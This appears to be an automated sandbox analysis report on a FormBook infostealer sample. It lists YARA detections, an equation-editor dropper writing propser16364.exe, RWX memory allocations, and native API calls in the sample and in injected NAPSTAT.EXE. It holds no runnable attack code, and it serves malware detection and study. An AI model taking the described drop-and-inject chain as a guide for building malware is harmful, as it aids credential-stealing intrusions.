          Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1/
          Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=17
          Source: explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040548D

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\propser16364.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\propser16364.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419D60 NtCreateFile,5_2_00419D60
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419E10 NtReadFile,5_2_00419E10
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419E90 NtClose,5_2_00419E90
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,5_2_00419F40
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419E0A NtReadFile,5_2_00419E0A
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419E8A NtClose,5_2_00419E8A
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00419F3F NtAllocateVirtualMemory,5_2_00419F3F
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008300C4 NtCreateFile,LdrInitializeThunk,5_2_008300C4
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00830048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00830048
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00830078 NtResumeThread,LdrInitializeThunk,5_2_00830078
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082F9F0 NtClose,LdrInitializeThunk,5_2_0082F9F0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082F900 NtReadFile,LdrInitializeThunk,5_2_0082F900
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0082FAD0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0082FAE8
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0082FBB8
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0082FB68
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0082FC90
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0082FC60
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FD8C NtDelayExecution,LdrInitializeThunk,5_2_0082FD8C
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0082FDC0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0082FEA0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0082FED0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FFB4 NtCreateSection,LdrInitializeThunk,5_2_0082FFB4
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008310D0 NtOpenProcessToken,5_2_008310D0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00830060 NtQuerySection,5_2_00830060
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008301D4 NtSetValueKey,5_2_008301D4
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0083010C NtOpenDirectoryObject,5_2_0083010C
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00831148 NtOpenThread,5_2_00831148
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008307AC NtCreateMutant,5_2_008307AC
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082F8CC NtWaitForSingleObject,5_2_0082F8CC
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00831930 NtSetContextThread,5_2_00831930
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082F938 NtWriteFile,5_2_0082F938
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FAB8 NtQueryValueKey,5_2_0082FAB8
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FA20 NtQueryInformationFile,5_2_0082FA20
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FA50 NtEnumerateValueKey,5_2_0082FA50
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FBE8 NtQueryVirtualMemory,5_2_0082FBE8
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FB50 NtCreateKey,5_2_0082FB50
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FC30 NtOpenProcess,5_2_0082FC30
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00830C40 NtGetContextThread,5_2_00830C40
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FC48 NtSetInformationFile,5_2_0082FC48
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00831D80 NtSuspendThread,5_2_00831D80
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0082FD5C NtEnumerateKey,5_2_0082FD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A900C4 NtCreateFile,LdrInitializeThunk,7_2_00A900C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A907AC NtCreateMutant,LdrInitializeThunk,7_2_00A907AC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8F9F0 NtClose,LdrInitializeThunk,7_2_00A8F9F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8F900 NtReadFile,LdrInitializeThunk,7_2_00A8F900
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_00A8FAB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_00A8FAE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00A8FAD0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_00A8FBB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00A8FB68
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FB50 NtCreateKey,LdrInitializeThunk,7_2_00A8FB50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_00A8FC60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FD8C NtDelayExecution,LdrInitializeThunk,7_2_00A8FD8C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00A8FDC0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_00A8FED0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FFB4 NtCreateSection,LdrInitializeThunk,7_2_00A8FFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A910D0 NtOpenProcessToken,7_2_00A910D0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A90060 NtQuerySection,7_2_00A90060
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A90078 NtResumeThread,7_2_00A90078
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A90048 NtProtectVirtualMemory,7_2_00A90048
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A901D4 NtSetValueKey,7_2_00A901D4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A9010C NtOpenDirectoryObject,7_2_00A9010C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A91148 NtOpenThread,7_2_00A91148
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8F8CC NtWaitForSingleObject,7_2_00A8F8CC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8F938 NtWriteFile,7_2_00A8F938
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A91930 NtSetContextThread,7_2_00A91930
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FA20 NtQueryInformationFile,7_2_00A8FA20
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FA50 NtEnumerateValueKey,7_2_00A8FA50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FBE8 NtQueryVirtualMemory,7_2_00A8FBE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FC90 NtUnmapViewOfSection,7_2_00A8FC90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FC30 NtOpenProcess,7_2_00A8FC30
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FC48 NtSetInformationFile,7_2_00A8FC48
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A90C40 NtGetContextThread,7_2_00A90C40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A91D80 NtSuspendThread,7_2_00A91D80
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FD5C NtEnumerateKey,7_2_00A8FD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FEA0 NtReadVirtualMemory,7_2_00A8FEA0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FE24 NtWriteVirtualMemory,7_2_00A8FE24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FFFC NtCreateProcessEx,7_2_00A8FFFC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A8FF34 NtQueueApcThread,7_2_00A8FF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099D60 NtCreateFile,7_2_00099D60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099E10 NtReadFile,7_2_00099E10
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099E90 NtClose,7_2_00099E90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099F40 NtAllocateVirtualMemory,7_2_00099F40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099E0A NtReadFile,7_2_00099E0A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099E8A NtClose,7_2_00099E8A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00099F3F NtAllocateVirtualMemory,7_2_00099F3F
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 4_2_004069254_2_00406925
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0041E8145_2_0041E814
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0041D0A25_2_0041D0A2
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00409E405_2_00409E40
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00409E3B5_2_00409E3B
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0083E0C65_2_0083E0C6
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0086D0055_2_0086D005
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008430405_2_00843040
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0085905A5_2_0085905A
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0083E2E95_2_0083E2E9
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008E12385_2_008E1238
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0083F3CF5_2_0083F3CF
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008663DB5_2_008663DB
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008423055_2_00842305
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008473535_2_00847353
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0088A37B5_2_0088A37B
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008754855_2_00875485
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008514895_2_00851489
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0087D47D5_2_0087D47D
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0085C5F05_2_0085C5F0
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0084351F5_2_0084351F
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008446805_2_00844680
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0084E6C15_2_0084E6C1
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008E26225_2_008E2622
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008C579A5_2_008C579A
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0084C7BC5_2_0084C7BC
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008757C35_2_008757C3
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008DF8EE5_2_008DF8EE
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0084C85C5_2_0084C85C
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0086286D5_2_0086286D
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008E098E5_2_008E098E
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008429B25_2_008429B2
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008569FE5_2_008569FE
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008C59555_2_008C5955
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008F3A835_2_008F3A83
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008ECBA45_2_008ECBA4
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0083FBD75_2_0083FBD7
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008CDBDA5_2_008CDBDA
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00867B005_2_00867B00
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_008DFDDD5_2_008DFDDD
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_00870D3B5_2_00870D3B
          Source: C:\Users\user\AppData\Roaming\propser16364.exeCode function: 5_2_0084CD5B5_2_0084CD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A9E0C67_2_00A9E0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00ACD0057_2_00ACD005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA30407_2_00AA3040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AB905A7_2_00AB905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A9E2E97_2_00A9E2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B412387_2_00B41238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A9F3CF7_2_00A9F3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AC63DB7_2_00AC63DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA23057_2_00AA2305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AEA37B7_2_00AEA37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA73537_2_00AA7353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AB14897_2_00AB1489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AD54857_2_00AD5485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00ADD47D7_2_00ADD47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00ABC5F07_2_00ABC5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA351F7_2_00AA351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA46807_2_00AA4680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AAE6C17_2_00AAE6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B426227_2_00B42622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AAC7BC7_2_00AAC7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B2579A7_2_00B2579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AD57C37_2_00AD57C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B3F8EE7_2_00B3F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AC286D7_2_00AC286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AAC85C7_2_00AAC85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AA29B27_2_00AA29B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B4098E7_2_00B4098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AB69FE7_2_00AB69FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B259557_2_00B25955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B53A837_2_00B53A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B4CBA47_2_00B4CBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B2DBDA7_2_00B2DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00A9FBD77_2_00A9FBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AC7B007_2_00AC7B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00B3FDDD7_2_00B3FDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AD0D3B7_2_00AD0D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AACD5B7_2_00AACD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AD2E2F7_2_00AD2E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00ABEE4C7_2_00ABEE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00AB0F3F7_2_00AB0F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00ACDF7C7_2_00ACDF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009D0A27_2_0009D0A2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009E8147_2_0009E814
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00082D907_2_00082D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00089E3B7_2_00089E3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00089E407_2_00089E40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00082FB07_2_00082FB0
